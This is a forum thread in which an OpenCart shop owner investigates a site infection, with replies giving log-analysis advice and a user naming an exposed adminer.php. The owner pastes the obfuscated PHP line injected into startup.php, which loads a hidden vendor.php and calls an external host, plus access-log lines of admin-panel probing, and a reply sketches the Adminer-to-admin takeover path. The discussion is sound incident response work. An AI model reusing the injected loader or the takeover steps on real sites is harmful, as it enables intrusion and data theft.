Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Вирус в startup.php


Recommended Posts

Добрый день сообщество. Столкнулся с такой проблемой.  opencart 3, внесены изменения в файл startup.php
Выглядит это так:
 

<?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?>

Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1);
который скорее всего отправляет данные на https://startportal.top/info/

Прикрепил файл вендор пхп, для примера, он зашифрован 
с использованием escape-последовательностей.
он дальше много чего подгружает. 

Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php 
 

Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт. 
Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись. 

Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник...
Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа. 

 

vendor.php startup.php plugins.php dist.php english.php

Надіслати
Поділитися на інших сайтах


14.07.2024 в 14:33, maaby сказал:

Добрый день сообщество. Столкнулся с такой проблемой.  opencart 3, внесены изменения в файл startup.php
Выглядит это так:
 

<?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?>

Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1);
который скорее всего отправляет данные на https://startportal.top/info/

Прикрепил файл вендор пхп, для примера, он зашифрован 
с использованием escape-последовательностей.
он дальше много чего подгружает. 

Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php 
 

Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт. 
Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись. 

Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник...
Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа. 

 

vendor.php 271 \u041a\u0431 · 0 скачиваний startup.php 3 \u041a\u0431 · 0 скачиваний plugins.php 474 \u0411 · 0 скачиваний dist.php 10 \u041a\u0431 · 0 скачиваний english.php 44 \u041a\u0431 · 0 скачиваний

Який хостинг використовуєте? Всі модулі та шаблон куплені, та де саме купували?

Надіслати
Поділитися на інших сайтах


Хостинг в беларуси. Hoster.by, самый лучший, что у нас есть.
99% куплено на этом сайте. Может пару штук купил на opencart.com. Никаких помоек я точно не посещал и ничего из них не качал. 

 

Надіслати
Поділитися на інших сайтах


Вам нужно обратиться к специалисту, например ко мне, и за обычные деньги все решается

 

Если вы с подобным ранее не сталкивались - у вас не получится, при всем уважении

  • +1 1
Надіслати
Поділитися на інших сайтах

14.07.2024 в 17:53, maaby сказал:

Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Надіслати
Поділитися на інших сайтах


14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Звичайно, мені також цікаво))). Я приблизно розумію де він таке взяти міг, але. Може таки все буде добре.

Хоча кажуть, що Самолікування може шкодити здоров'ю.

Надіслати
Поділитися на інших сайтах


14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

А я пока схожу за картой, чтобы показать откуда на сайт готовилось нападение. 4 разных модуля. У меня и домены есть. 

  • +1 3
Надіслати
Поділитися на інших сайтах


14.07.2024 в 23:08, Yoda сказал:

Купил попкорна...

Делаем ставки, через сколько появиться опять.

Вы же расскажите если что ?

Не должен, по крайней мере я надеюсь на это.
Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус. 


Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок. 

Надіслати
Поділитися на інших сайтах


14.07.2024 в 14:59, maaby сказал:

Hoster.by, самый лучший

Ну так и писали бы самому лучшему, а не сюда :)

Доступы есть лишь у вас и у них. Чем кто-то без доступов поможет?

 

Могу разве что посоветовать начать дружить с логами.

Берите дату изменения файла, открывайте access.log и смотрите что происходило в это время.

Как вариант - были какие-то запросы (скорей всего POST) к какому-то из файлов - открывайте смотрите что в нем.

Это может быть целиком бэкдор или вставка левого кода в обычный нормальный файл.

И дальше аналогично смотрите дату его и по логам что происходило в то время.

 

Это один из наиболее частых случаев. Когда с плагином или чем-то еще заносят собственноручно бэкдор, а через какое-то время его хозяин начинает им пользоваться.

 

Но может быть конечно и иная схема. Включая уязвимости где-то или вообще через "самого лучшего" зараза могла просочиться к вам.

Надіслати
Поділитися на інших сайтах


15.07.2024 в 16:16, maaby сказал:

Не должен, по крайней мере я надеюсь на это.
Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус. 


Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок. 

 

 

Надежды юношу питали. Хоть и кацап поет !

Надіслати
Поділитися на інших сайтах


17.07.2024 в 00:28, buslikdrev сказал:

Это ваш сайт? https://aloe.by/adminer.php

Добрый день. Да. Спасибо, что указали мне на этот модуль. Не помню даже, зачем его ставил. 
 

16.07.2024 в 16:22, NotSlow сказал:

Ну так и писали бы самому лучшему, а не сюда :)

Вы вырвали из контекста мою фразу. Самый лучший в РБ. 
Я понимаю, почему вы это пишите... Но я уже давно не живу в Беларуси, т.к. не согласен с тем, что происходит. Правда магазин еще там остался, работает, что-то зарабатывает и помогает оплачивать тут счета. Отказываться от того, что приносит хоть какой-то доп. доход, я не хочу, поймите меня правильно.
 

 

16.07.2024 в 16:22, NotSlow сказал:

Могу разве что посоветовать начать дружить с логами.

Берите дату изменения файла, открывайте access.log и смотрите что происходило в это время.

Как вариант - были какие-то запросы (скорей всего POST) к какому-то из файлов - открывайте смотрите что в нем.

Это может быть целиком бэкдор или вставка левого кода в обычный нормальный файл.

И дальше аналогично смотрите дату его и по логам что происходило в то время.

 

Это один из наиболее частых случаев. Когда с плагином или чем-то еще заносят собственноручно бэкдор, а через какое-то время его хозяин начинает им пользоваться.

 

Но может быть конечно и иная схема. Включая уязвимости где-то или вообще через "самого лучшего" зараза могла просочиться к вам.

Огромное спасибо за дельный совет! Надо было давно проверить логи, только я с перепуга всё стер, как только увидел :)
Скорее всего ваш коллега выше уже нашел то, что я должен был обнаружить в логах. 

В общем, файл adminer.php лежит уже на сервере с 20го года. Но попытка загрузки сторонних файлов на сайт была только пару недель назад... 
Вот интересное еще в логах нашел. Стучались по следующим адресам:

109.196.163.71 - - [02/Jul/2024:09:47:21 +0300] "GET /composer.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:23 +0300] "GET /package.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:25 +0300] "GET /adminer.php HTTP/1.0" 200 4049 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:26 +0300] "GET /phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:29 +0300] "GET /phpMyAdmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:30 +0300] "GET /pma HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:32 +0300] "GET /myadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:34 +0300] "GET /dbadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
109.196.163.71 - - [02/Jul/2024:09:47:37 +0300] "GET /_phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"


admirer.php как вы понимаете, был...

Буду обновлять по мере появления новой инфы. Всем еще раз спасибо за наводки и советы. 

Надіслати
Поділитися на інших сайтах


  • 3 weeks later...
17.07.2024 в 14:57, maaby сказал:

admirer.php как вы понимаете, был...

И достаточно создать нагрузку и увидеть данные от БД. Дальше ставят пароль на админа, потом через установку модулей загружают свой скрипт для получения полного доступа.

  • +1 1
Надіслати
Поділитися на інших сайтах

  • 1 month later...
06.08.2024 в 15:20, buslikdrev сказал:

И достаточно создать нагрузку и увидеть данные от БД. Дальше ставят пароль на админа, потом через установку модулей загружают свой скрипт для получения полного доступа.

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД. 
А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23
Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его.

Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

Надіслати
Поділитися на інших сайтах


В 15.09.2024 в 20:39, maaby сказав:

В этот раз не спешил и сделал скриншот изменений, которые сделал вирус. 

 

2024-09-15_16-41-06.png

Готов розібратися з проблемою, пишіть в особисті повідомлення, доступи до сайту та будемо разом розбиратися.

Надіслати
Поділитися на інших сайтах


15.09.2024 в 20:54, SSHEVA сказал:

Готов розібратися з проблемою, пишіть в особисті повідомлення, доступи до сайту та будемо разом розбиратися.

Спасибо за предложение, я пока сам. Если закончатся идеи, тогда буду искать специалиста. 

Надіслати
Поділитися на інших сайтах


15.09.2024 в 20:03, maaby сказал:

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД. 
А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23
Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его.

Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

 

Битва головы со стеной. 
У меня уже третья порция попкорна закончилась!

Надіслати
Поділитися на інших сайтах


В 16.09.2024 в 18:32, Yoda сказав:

 

Битва головы со стеной. 
У меня уже третья порция попкорна закончилась!

І не кажи, зараз ще 4 принесу, бо бачу це надовго:grin:

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.